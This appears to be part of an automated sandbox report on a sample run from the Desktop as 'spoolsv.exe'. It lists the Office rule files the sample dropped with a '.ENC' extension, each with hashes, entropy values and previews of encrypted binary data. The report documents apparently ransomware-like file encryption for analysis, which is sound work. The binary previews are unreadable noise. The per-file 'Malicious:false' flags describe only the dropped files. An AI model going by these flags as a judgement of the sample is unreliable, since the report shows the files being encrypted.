                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...a..=.l\..!...%.G@9..l..3.8..a..Z7$e....../.......L,..P.@.<.$.k@....mx.....^.X...y.....J...~S]....{:.t).g..>%.v..5....!..s..t..>..n......"....[...{.m.....}.X|dU}.:.....[..E.^....?g..-.)..."..T.#..O...A1.X._..i.r.....a.t.8l.q8(.eFe...&.j......V..>..M.....5gR...p....|..>..p..C.....Vl...L.H=.hx....'....u.f.f?........U.7.S.....';x.1.1..x......Y.[r.)#<h..>..M...Dt._G........Tzy+F.F.y.K..4B..I....#...................L`N.k...nh..He..Wa...yPo..M...p.tS..kaCU.>..[....ek A.........Sa<.2.Y..lC...8n..9,.i~..3..i..:...;...*..|..3......_X[.k..5..g..jF.....4:.....Gr=.....6............;..*i.5.>j&....Gp..H..u...'....K.5.;..dp..n..#z......}.....e.......q..6T"../.i.D.....;..\%nt9..XC..Ge..W.f..6.C\..........'j.E......&.....13..'...uwb"iL&F|.9%..;.\.Q......5.(+}Q.=...E...+~....S.'..Jh.9.....s..p...fv.!"O.'V.r..$.....?.h...#p.I....e.`...F?../.)...E.u.wQ=hy.D'......c.g..D#v.....y..,..k..p.....GK....ET^..z...b.w.:\...S

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702700v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.856495083913523
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/K34l2UpCibVWL39EbCUVFKPIhNKT6/5cMMWWLVs+wgJ:/K4pCiOa9nhwT6hMPLVHvJ
                                                                                                                                                                                                                                                      MD5:4C9347BE42051F868F7708DC481390C0
                                                                                                                                                                                                                                                      SHA1:90651E28C7DD6D8DAF60448319C511207FE90418
                                                                                                                                                                                                                                                      SHA-256:BFEA26FEC0B9A7A1D87D67283AB133C7FBED77AE73D85D3B6EF56199F544E215
                                                                                                                                                                                                                                                      SHA-512:5B2EB64DA6967D44ABD0DCBC2E13AEA675C0BDDC1AD09E5EF9F57EBB7C340AE0A556FBDEE8F5E6CA8D304EDA5618093EA963720817A2353FEF9F3396E6C62F86
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.Y.._...1.[r...H.UN.2...[V.E...VQ....{.@L1m..E.3.....r%8.../8.........K$\.t...(.h..........M..q.ENY.de.......q...C...........A...sc...v.}.(.v]>..........U`.Q.F.).O...p.c.>...wXR.r.1.......Go...Q[G.78...<.z?~.....1..;....<...<D.Y.I0NV.e!"..!..cM.Y.0p..n.H..C....4.J.....<.'....RmL(.0.b.i.<3mp.....nHdA.k<\t#.:r..i...O>.%#..Q..o...>.{}=.v......._.A.x.[Pdj.g.K.....%...IuO...WE9@.T.|........U..%.?/..j....v|0.Y.xi.#QqB.r&....z..K..,.q...S..D$.......]..5..-S.$.7q..._.y5..........N]N\..t....p......i...MC.Q..._...n(.s.X...i4.}..E... ...;K./9...M7V:...A<=..S...X:...b...;~.v..J@...w.0C...y.J...a..N.K.l..p...@....X..[... .....3.d,p......({......?.1).,C]..k/]u...F..+D.3Aww.....".C.p%}.]..G.E...<..c8k.H\...@6F.!;x5.?....Y..B.....c4D.k.1..Pg.%.%}..aM.*.4o.7.\oHD....c...g<.y4.#.q....T...M..A.%.}...U....P.!..g.6E.6G<.7......^,e.lr..$....Q.0.-....'.E..4........q.e.....oS......=.....;.. #..n.R....T......M...T.Y.M

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702701v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.866183529990128
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/+fC7Gydf++XwOa9BASd8VQcQV5T9EIOY9quCAdsdtYk4ek6AL+mtsZ76iTwsWNA:/+a7GyR++Ta9MQZ3m2gubWdtY9e1A+mm
                                                                                                                                                                                                                                                      MD5:A7610A35628A2AF764F416899CED8815
                                                                                                                                                                                                                                                      SHA1:46AA35BA54A965B19372F3F8D0C00025465BF593
                                                                                                                                                                                                                                                      SHA-256:3F10D8CFD2DDDA25A94626A91CABD7389CC12B9443A09C8D2FE79F1EEC6D3671
                                                                                                                                                                                                                                                      SHA-512:439C72B878D1E302558C5AC1712B6A06F70629993068F2138031B7006CB29CDEBC26CE9C24BDA518EF540EA54FA786EB9B74629159FD5D3935B5BC6545B15298
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...5H.X...isvQ..g2..l..mu!l..!.........Nx.."..t........g.c.y..o..y..=........... ...Hb..,..D........A+..CG.k...d...............?{........U......$OY:i.7$B...."_....X."..._^0.[.s.i.b7J...L...}{..p.W[.8..z...ua|..dq.."j..K.s.G..x...a......C.x.`8|.6+5%..hjQ...R ....R1|..Y...m..k.l......h..e...F.T...OT....[..a.ua..j?o..!.3...,.}..Wo6.b...'..,.8.t.d.9n..Ce ...2.y.]~.....1QW....$.:.l<beS..c..mh....`.*..3...wG...Tac.]~.m......G_..8..../.X.'.n.]>%e.+...c..v...J...6..w|.g.....j..i.....~7'.-.!.P.~t.>........=....G.?VH...Z.*a. .-%).^...}R.t[qP2.......;.......h.".K.^F.w.7.W..b......S.V...!...:tuP...J......e.^.CV...D..v...fzk..~:.C.l..-KvQ....wC.]t..IHfX.i..u...}.oG....R.E...\...~...i...u..&8.....Z,_qy..V..d{yhf..O.4s..A^...E[..7.c..y.r...../.."...{7T...c.......%.;?.....|(L..<#-....&G.`..a.S..T.cD.-<.[8t>6..:.A......@eS5]....(t.V.....q.7.......;...........5.:...[...d..J...!..M..6.....a..p..C...1..L.j..r

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702750v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.868520382812705
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/fyvKOASJfMh46I0o/Xr2GaW97BwZMcee6zqwfWa413Pn6v/NqONCb4WErH/Ot:/fyvhjChZ21wZxeTzq4WpSvkONCbVEr+
                                                                                                                                                                                                                                                      MD5:460E4AE30EEF9CDC32A7C55E8C5EE9DA
                                                                                                                                                                                                                                                      SHA1:652EC62A81985B0A6FD2E0FBDAD1E335AADBD669
                                                                                                                                                                                                                                                      SHA-256:4E48A96D4201BFB533C69ED56E3D6142B4A0E821908D05347B72C7AE554B2BE2
                                                                                                                                                                                                                                                      SHA-512:9DBDA182AA5E04DA248E3406350711AFDC5BC5E6924CF8795EF2FBC2344A13A786DF1B8EC7B7DD5FA3EB788EC0EEEEA0100C939FA2B065DC30C25ED25AFC7DA7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..F......O..v.g.P'...n..;...8.L...o.....b.....B.k.....8....7.IN...8.V.....De.....n.......n...G~.....z.Yf.a...p..+.?.=..w.H....R............,..`..x..h......]4p.z.EB.C.u..9...`.....m.....Ee....q$r...%....a~sF..~..RY4?.<....O...x..L.n`..,.Q%S.I.}..Cd.s,.V.#.bb...6.[Vu.p.e\.M...7./../.....:.)..c5.K$'..}...8...3.....#..0C0d..c..O..P"..Gz...2...kJ)..tnS..."..e...?..s4xE..7.d$.E|.r........|.7.mP...L.$.......K(.D{x..e..FaY.....4..........3D.E...s........W.....w\pr..s....`..G...e_....D...E..SX.W&...y..x.c...C#c..:...0.c...-$NN.t..1...y.P...A,.q......}..(T..?b......y...HM.0.J....U....b..t#.]..e..2).....4...U.C.5........xl..../0..........P.5...@.......!E..>`:.v..%..-.W._.\...WW...a..Q.....n..X(..../?IA...bV.?UD..x...R....K0.......D......Fr..a...=..X#..u.#x%G.n....i.....m.Y=.,I`...^..R...w..U..5..@.9..|..)s..n;.y...DD.]..x.K.....V..^....X:..Ki.JP.'..^O.f7l-#.....<.-.....PYo.7..)A.W0.m..|w...2..z|Q.VKN?;.Z.;.GN.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702751v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.85601424532821
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/mHu/esuxeBksZddoTFRCAynk4nD0F7bVGeFk/sf+qyZPH:/mHWZaeB59E3CbLYw2kSlyR
                                                                                                                                                                                                                                                      MD5:7B18F5083973C3B0F298AD9B87D8E30D
                                                                                                                                                                                                                                                      SHA1:61542CCFBD6FA5ED610B6A6D3F1A85A29B82D741
                                                                                                                                                                                                                                                      SHA-256:12E9D345A2D1DAB56618538EFA3641257D2298A4D0391E79E944F53367C742D9
                                                                                                                                                                                                                                                      SHA-512:FF5F8A4CFE8ACC3687ACE484866F2CE5E0BA988C18CC21BF43EB5D9EFB6897D42B012E267E2C04FA136A73FA8AE57B5F38465E89282C56435F55BD959D6298ED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.v...q.o.&......Gy....7...../yQ].lF....P9....y......u`..Ckb.l.........".vx.a.M..M........9&...!.w.....mb....K.>..,.Z.. .[....V2e.0.>,;...5...At.0..5..DO....O(..33])].!ij..>...d?..<.b...4K..D...M=INvz..X.B..G..<(5..E&#R..'.....e..Hm..r....s..0B$.]3.h.../.fb..5.Q...0..??t.....!dc...%..d.>........xKg..z{.....^:....PG...FX&$....Vhp.7..lR.+..n.Nm..*9...p.M. R!.E...0[O%?..N......%.}..:...m...;x..g...G1...p.D1}.."2.]....Nl..2`....I-./.}.Q....x.a|h.T.1Y)..........Gj.B.,u...q.3.......&..r.......?..4.....1Ut.............-......9{p...,.....08.l.:..l.i....^b3..2.A."u...3.5..e...u,.s...~..9....Z.....*.T..2...K.......(~.........Z. c.O...y.....tz3.........w.W....i.WS%.E.H8^.A..h..9n..u.d.+1..gR-.{..U..oV.K..~........N....#4]TW@Gz.&......}!e..m...C...j.........Kf..$h....J)e..zmy...../..b......}.M}.5.. 3p).......+...S.#.Y0.E..._l}...N[...]gy..S...o..n..6\.C....e8.N1vr0.....f}....$..D.U....Z..q...>.n

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702800v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.8808972108259825
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/V6HWG34rOSfmm2G5LqegOWvAQ0K+AsFkDZqldC150vpCwXFGn3BUY/sBkU:/V6HWm4rff6kL+AQ0Ky0qlm0vzGn3e
                                                                                                                                                                                                                                                      MD5:FD3B3813BA7CC5388F0DD7682E3B9AB8
                                                                                                                                                                                                                                                      SHA1:EA5EB2AED502686063AB6F98E3ACED36D8FFF9E0
                                                                                                                                                                                                                                                      SHA-256:ED7B480277DAE03899F5C286A2BF6B00091BA640DE5EBF4B85896D74D1CEAAD8
                                                                                                                                                                                                                                                      SHA-512:A181D3832D2493981ECDDF31BF06320FBBC161D8C97FDCC790C751334E9D0FFBC3185383288A06896E7C920D1CCE9BD193ABC9DBCA8E56902BDBC60AF93EB72D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......^...l.i..}gg..{.......|.f..L....~_...Bdv(..iq....`..O.....CL..KD^F !.....Q...U..Bz...a....9....f./S.$~T...}.<|.....]....p]."oD..Q....3v.z?...m..vv...w.....<....*`......F<.......J...oH..P.eZ.;..1..P...7..y&.-E.L..=....E.......O..[K.7r..?....W..T..gY..'.?.K.....\.8.:.P.o.d..#I{..0...s[V...b...*...`..c.....F."uO..R.u...?S.....bHJ(@.a....\...i.*... .Y.I..b..8..B.i..&..3Q@..[W?k.[..MOK...!..q.wX.:v.).j2y.........?...m.....Qkj?.....5..`...^e..I,p.....|..u....83.T.D..D.v.zJ..%.e.&!n..A........l3H.F......Z...NX..s.0...@....W.7.^..csNm.....i~e.!tC..)sh{.c......+...B.......^..xx.fL..{z$Y...'.....L.............|`..b)D...A..4..vT.@Ti..N0.}6..Z...P.T ..f..xk.8.i..s/#o:..T......1.Pn+i....!....#u.........@E/}......MG............h...A.o.G.j.......@u.lj..$r.(..O.....E..Y...mas.iS..I2...4.....3......:.|.q.V....W,.Ge.....^.p.k."...<..QQ'....C.u.. A..u......I;.c....J.zG.y...q^.`...5}..-..Q...(.QL....h........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702801v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.859834461448146
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/FdBuh1725yq0x0HhewrgruT2cYioSA4FD0Jps9aF1xadwSEDi+I+0gHz0Qm6:/Fg76ZewrLFK4l1yxa5gingHz0Qm6
                                                                                                                                                                                                                                                      MD5:44B8C0C0D06ADD363A1F6DE242B828A4
                                                                                                                                                                                                                                                      SHA1:F157E60B4FF1813205869BD94F4FE285198607DA
                                                                                                                                                                                                                                                      SHA-256:1A92F60ADAC5E94856C523EF7F946A44B3D1DF790ABCD9A8BF660D878B7AF764
                                                                                                                                                                                                                                                      SHA-512:C47214728DC2847B3A4B123AABEEBF29BAD7FC727F8E3265630F88B9F5AA43A08437F07BE23532943FFCB6E9B15450255238EEB49C2A732FA7F655697176FCCA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..Q........=..v..R;.Q...'p>1....Z...&.g.|..5..|..*~...V..G..J.^.X...-.fy.3.)......b..b......1.^..&...[m.j;.&..m..._[:...@....^..%...?.j...b8.3.~.8Wc{..6a...F...)..n...^y..... ..S.....z..TR....b.d.".dO..L...D...1.3....._M...HK5..Q.N....'=..c.....np...I..}..[.U,K.v.-,...}.Z.#%yk..<..&W....7..d......y[...[.......A..g.......gU.0..d%G]l.qf......M8......^.p,.@Bo.U;..z.W.a.c....E.g..P....~`4...... .....S..ej.9X......{.$..?....)...-Dn4.g.|Q..r..y..7lfa.G3!.6.D..(.f......G..m..u.Amfl\...#.....X....z+.T.|.Xv........;1...d....n....A..V..x..QG..7..b......<.>.6.,..o.Q.b.?e}(.cP.v..m......U.}.8/%d.. ZD{.....0.[.".5.d.N.>..Ec.2..|.,.;(.m:...MC.....Dn.j4!.p.....T...k.l5...fo..0.....I...k...H. 8.R.2..J....hQ`MP~#.S. ..^oui.I..&.B......pp9.V....dU.>(.......7$....^..f...1..r.ff...z&..e........r._.-.~@.......t....E.=....7.F...l....+.9.0c6..$..=m...+.z!.....ms......Y.^...+&...O%_...w..x*..Z.~/......Ot..U.A.5&9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702850v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.878816695727895
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/6k1ybZlojEjnlg4ApjSwur4Ra3ZeoMD23n+OBwqXAdd0W4f4m:/D0bsjSnu4Lj4k0oe2u2XAn0W4gm
                                                                                                                                                                                                                                                      MD5:690FF9715DBF293F3D97ADC46B0F2DB7
                                                                                                                                                                                                                                                      SHA1:E832B5B77D5DA704F209E5F131EC951507033E6D
                                                                                                                                                                                                                                                      SHA-256:D79819FF9952B3B5D29B0A5BFA5B4A038B49A18D562825FC70271C35F45D73FA
                                                                                                                                                                                                                                                      SHA-512:C8124282BF0FFD9E4F1247A38AD45F3ADE7DF29C23E8534DABC7184D7D1F49C1545E0C83149B251BEDA63019B750DD5C630A46371D22E259A31A1F4812E0CCD7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..F\.\3.l.......E.Wu....3T.3{.U;....3..E.........c.........X...%z.._+t...4.A.H^..+3....~....V..3f...]..Hb .d.a....3....U...)..a......t..Y..o.k....I.a......8g....f..B.(.(.XH.9...F...H4dD..t...m...B..q...@S...r]@..(..d..'|.hh.o4..=Q(...w..[...S9.x>....}.....o...sw..<.#'..x.0nj_C...:FB.,...8.Y.4.2..G...(..C....{<q]"2k..j.i.b.T.+.........S...f6.@Y...C...A......D....$....M.Y..*..M.....VZ.O....2...b....$...._....[k\x.y.oW....@..W[..W..B..x.:......`N$R.....p;.E..~.:.,.J....G...n....rEF..'.q...I)...dTb..;r....l.P..I%.(.....)...Un..I.._"....l....!...Q..!U..:(....0...VJ..P.Va...6.o.Q..1.m..S!|B.....}.J....M.,xt..L+\I.o.(..D.%..o228{..$.r_.%.!..... ^P........$sS..H.i...&_r>....u...2..D.7..o...f.M.-a{T/3.A.g..&xO...`E.|.Z...".pZ.j....T..".@....mR..8........U.K.....B'.s.=......,.|9....pN..+o3.i.g..{.F...3.su........UZ..dOq.W0`..B.C,.K...c.6.4..vP..1..T.4..W{S..j....E..U..u0.9[L.~...Dv..k.t..Rg}.n.i+.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703101v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8749435392458285
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/WqIsx9umEo8FeBO00ByK9TGZsEM8a6apSsRbp99Jhj1rIyyGHm8V458YJGcrUid:/WqXx9NE3eBOfAoh8ipSa/sGGPiGhd
                                                                                                                                                                                                                                                      MD5:FAFB15BAC7F222B2DD747BCD4DD990DA
                                                                                                                                                                                                                                                      SHA1:FBC11AFC104107787EBBC83EFE0C75347A36F958
                                                                                                                                                                                                                                                      SHA-256:21D28C27334BB2881DB327A5955186F3C26C480517539802AA28060E9B5A8E5E
                                                                                                                                                                                                                                                      SHA-512:3DFB7AC7CD4D6CEFA9CDD66690797C8B4320181D43B58F2DAF4B2D26622ACA0771CA5D172E94C34DB67B0F798368A69CE606640ADAF38DB15EB270E1C7F565FF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..i....<..).w.6.......~".....S...W...rJ.`.8..+...{.(b.r.z...q0.I...4S\.x.p.(3........O.... D>.A.[u....5j..W..E.<..).g....N....ak...].2.G7:..qI...9.p........._.&.J~......*Hn.....Ua.....6]..M.n..4.$.......(?) ..Q...J?n0.t....Q...;..}q...B.:..I.~...x.aPl..>Y.H}|.v*m...F....n.f....h..F..+b...X@.2.uIY.A.r.{.t..$.y&....3x~.....a...7'`xd.l..G.B.o=&.k5.yB.Dv...b.s..........O.k.w.3b.ZK...V.c4h.^....5.:o1.6...s.R#.....3Y..D...9...+`....l.dK.@.....?....9t>.H.:-...!.fG..\..T..Bdh|...-..C .............a...........o....7.^Qm...Q.d..G.KV.v...}I..54.......r\.s......k.nd'vX7Xw~.J..&....^.X9s[..he@):,`.e.....c.K..K..2......v...E..e....\...(..aKL.].....Y,=..$y..m.o=8.N#...k=p..H8mMr......lk..TrMEd..s..2..~...6..7..lck{.o.K..>.X.-..g"O.o..'..._..i#a|.Oa..^.N].W.`x5.PIa...J.9....O=..[. l.zu.....C......a.>y/.n.W?.....`...cHzK.....+hDE..WR./R:........xF..Aq..sa.y$..xSj......e#....L..'.i.9F..m...}..2.PGayD._..._..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.869681370232315
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/Bas/kGEdsFXAQVEeO4YGzKPDWzhd+7NiLceiBeMkVQuwhlJ0e2Tt0FbPpg8C3:/10d8YlPizX+7UAonwp0e2TifC3
                                                                                                                                                                                                                                                      MD5:FC1B79FAF5EC3666DD5B8716F69200B0
                                                                                                                                                                                                                                                      SHA1:C06D72B7A5C9A1F7877D836871240B74070B4326
                                                                                                                                                                                                                                                      SHA-256:97D052B683A4057466DFA4ABFA6C4869F2B675F5DBE9B1431BC0FC82156EC089
                                                                                                                                                                                                                                                      SHA-512:2C2D65954CD1478B5509135FC47F8B7D1F6248703FA97CD3214D6A2FC00CC76C8A10CE51EEFDDE12219C5C4B333710C3AC51D38D3025E1116D5509AAB9690C80
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.9<.|.._.{.J...s.1&..`\ua.J..>>l.+X%.._..*...'.......V..!.&n....K6.7cP .T..9u..A.LUz.9.t..&~.;`c[.&...|^c.K..xk.>.qU>.qa..Z.v.I.....:.<.q..94.U!.>i\....-\ia..1.y.t1.VA.9...Th.t?..e=..;..z..K..e....|..bdfWa..7........K..E.........Vj+.SN.f..!.t...|s..z.....(..w..p..."S"...}b.t"B..;.H<X,..O,%.t./.z[X...A.[8....).(..g%#.8A.M...."...5.;..LO...'.=.....+..G...z....?K.VkL<wd4.....rI...p..+i..y.....\....:..t...z..S..:......\..:ucqu....l.....)k)E~c.q8rF...<....y.#_2...{!.7B.......!..9....}@<..l....5....JxJ.....Z\.7...=..{`6#.)...f....S.?Mx.V.~.6.b0mvn.......=^..>!...d.....@-...4..y.T.r..4K..X...^.G.n..0&.....s..M&'^jj4..b...:......!...6&.N..:.EJ<..g.....H.=..D..f./.*|*0.....m..#{X..%*......}......5.P<..%;....z....H_..).....f0].^...(4C~...R...............O...,.,...Q...%Ib.F...k......$.;..f.+.}.C..]..R.f.1t...=.....\..4=g..M6y.r.$.s........#<.Q...I...X.|'.....;v..8.a....W.......*r...-.N..s1...E.R.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703151v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.857410457401947
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/IdCGLX+QaHUMkLvd5k3iwnJds29XJCHesS+IBuzBUrmOLTFtTwHIP:/2C6XfjL7wnDF9XJCpsuzBUrmkzN
                                                                                                                                                                                                                                                      MD5:E3DCB666696346DCB8F6BAC1339B308E
                                                                                                                                                                                                                                                      SHA1:D0CC4FE43BEADD496984E84B15B152A4B2718318
                                                                                                                                                                                                                                                      SHA-256:ABFB1E043B6ADAF8A69F4B0CAC88319B622E62274717BFEB03B3A706625C86C9
                                                                                                                                                                                                                                                      SHA-512:7CE043711CF299505BB0F9975D09193BABE1C06EC71C972616CBF6F9581561F05077B1D153BE7F3245DCD3E406EC46859F6ECE39597A88B127835EC09F4B2088
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....t.p..6>ur..+..2..J0....[......\...l.r..K.;....Ui.....i.t:)M....J.....r..0.7.9....}....[...p-.P.&I.\.~p.ccz.M`....n.....ZO.Xq.+..<..D..!......D.s...`..v.;......x....z...3|D...&J...$dM_...N...kJF...F1d..{T.[.2.Mj....J.."....!.zS2.S.TZY@...7Cv...9}......[D.g.~.khX.j.i....Z.h&:.7...;........;$....v...B.S3..h&.e.G......9.J.{..{+..b......;.C{N.5M....+.<%..-I.@8Ux..\i..1..X...e.Fm..e."....ppQ.Rl..g..E.E.MC....V._......m0....&b.U..D>......m........5.a..1...R......j.'9.$:_.........U.l...gK.=..d......b.2....4.......9....J...sq....7lH..!.D*.G.J.p.gF.D.....P[_Q.c...mH..",.o.A... .K..&......l%..6.....l.O......h).|..-...IE].L..0..df...Z:n......o.l..+....o.W..=.o...W../.}.u.N...#..F...d..y....{..o.....R.......n.m..p.!....-}.. .x..L.....I.k8......3.M{m.h...Q4../.v.i...3...".9...E....%f.......O\.......P..N.^E..0K....N.....m..55..Q.Y.=`.K...WhA....,R..*..m.-..5...@....)....].Q.0.^.O^o~....0......V..6wp."Lu

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703200v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.876835876975851
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/OByq84THDrrBIW9Eiyesatep0socefaEQRJarSN36kd7wR77ha/eQ55saKdTFcJ:/OkqTjxIW+UBfaZJaON3Zc/hrtfdTFu
                                                                                                                                                                                                                                                      MD5:3400D410FBB05634EB188C8FA2B8A3F0
                                                                                                                                                                                                                                                      SHA1:A46A9299B61B57B06AB60953D72129FD05E9B071
                                                                                                                                                                                                                                                      SHA-256:0226C6F0FE55FF71E9E95A63AD8561059216FB992606ED744ED243EC8EE4D3DA
                                                                                                                                                                                                                                                      SHA-512:CFBD88F851C9FA2EAE1B36C929467835FB58018B95A3A7E536C710D1AFB863B277931604B571B4D21DE37F04C99241D3B03F20A2ED2D48B4752EAAFCD23991FF
                                                                                                                                                                                                                                                      Malicious:false
